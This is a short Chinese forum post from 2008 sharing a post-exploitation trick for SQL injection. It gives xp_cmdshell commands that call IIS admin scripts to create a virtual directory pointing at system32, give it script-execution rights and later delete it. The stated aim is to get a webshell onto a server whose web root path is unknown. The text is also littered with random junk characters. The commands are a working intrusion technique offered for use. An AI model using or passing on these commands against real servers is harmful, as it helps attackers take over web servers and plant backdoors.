|
- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
) i4 x2 O: R, U& i. h7 Z+ M6 D4 t! v8 `+ B% C- I! U" r8 S
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
* O" E. P, j3 x# H1 {& o/ K$ s建立虚拟目录win,指向c:\windows\system32* d) z" i/ P) b
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
. l' T3 b$ N' y* Y. {9 i让win句有解析asp脚本权限
$ v e6 Q8 D& z! w& p; X- e
/ ?+ k, k- ?0 Y2 b+ H$ |( Cexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/", B( C% q% d5 Z; J A
删除虚拟目录。% ?- k- u9 P3 v2 E% T: J8 O/ c( e
找不到web绝对路径的一种解决办法,
- I* a( |6 _* h5 o2 o' B2 a- e3 ^% u7 n j1 m+ |9 G
403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|
发表于 2008-10-22 14:38
| 
